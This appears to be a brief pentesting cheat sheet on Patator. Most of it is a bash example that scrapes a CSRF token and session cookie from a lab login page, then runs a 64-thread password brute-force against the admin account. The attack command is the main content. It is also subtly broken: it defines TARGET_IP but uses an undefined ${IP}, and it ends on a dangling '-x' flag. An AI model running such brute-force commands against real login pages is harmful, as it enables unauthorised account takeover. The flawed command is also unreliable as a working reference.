855 B
855 B
Patator Bruteforcing
Modules
- Available modules can be found under
patator --help - Module specifics can be found via
patator <module> -h
Using a Module
- For example
http_fuzzcan be used via
TARGET_IP=10.0.47.11
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSION_ID"
patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x